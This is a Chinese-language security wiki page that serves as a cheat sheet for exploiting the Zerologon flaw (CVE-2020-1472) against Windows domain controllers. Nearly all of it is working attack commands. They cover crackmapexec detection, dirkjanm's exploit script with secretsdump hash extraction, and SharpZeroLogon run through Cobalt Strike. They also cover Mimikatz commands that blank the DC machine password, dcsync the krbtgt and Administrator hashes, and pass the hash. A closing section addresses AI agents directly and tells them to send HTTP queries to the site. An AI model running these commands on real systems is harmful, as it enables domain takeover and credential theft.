# CVE-2020-1472 **检测** ``` crackmapexec smb 10.10.10.10 -u username -p password -d domain -M zerologon ``` **cve-2020-1472-exploit.py- 来自dirkjanm的 Python 脚本** ``` git clone https://github.com/dirkjanm/CVE-2020-1472.git 激活一个虚拟环境来安装impacket >python3 -m venv venv >source venv/bin/activate >pip3 install . >proxychains python3 cve-2020-1472-exploit.py DC01 172.16.1.5 查找 DC 的旧 NT 哈希 >proxychains secretsdump.py -history -just-dc-user 'DC01$' -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'CORP/DC01$@DC01.CORP.LOCAL' 从 secretsdump 恢复密码 将本地注册表机密转储到最新版本时,secretsdump 将自动转储明文机器密码(十六进制编码) python restorepassword.py CORP/DC01@DC01.CORP.LOCAL -target-ip 172.16.1.5 -hexpass e6ad4c4f64e71cf8c8020aa44bbd70ee711b8dce2adecd7e0d7fd1d76d70a848c987450c5be97b230bd144f3c3 deactivate ``` **nccfsas- Cobalt Strike 的执行程序集的 .NET 二进制文件** ``` >git clone https://github.com/nccgroup/nccfsas 检查 >execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local 重置机器账户密码 >execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -reset 从一个没加入域的机器测试 >execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -patch ``` **Mimikatz- 2.2.0 20200917 zerologon** ``` privilege::debug 检查 lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$ 执行,并且设置密码为空 lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$ /exploit 执行dcsync导出hash lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:krbtgt /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:Administrator /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm PTH sekurlsa::pth /user:Administrator /domain:LAB /rc4:HASH_NTLM_ADMIN 使用 IP 地址代替FQDN 用 Windows API 来强制 NTLM 重置密码为Waza1234/Waza1234/Waza1234/ # https://github.com/gentilkiwi/mimikatz/blob/6191b5a8ea40bbd856942cbc1e48a86c3c505dd3/mimikatz/modules/kuhl_m_lsadump.c#L2584 lsadump::postzerologon /target:10.10.10.10 /account:DC01$ ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.heresecurity.wiki/quan-xian-ti-sheng/windows-ti-quan/cve-2020-1472.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.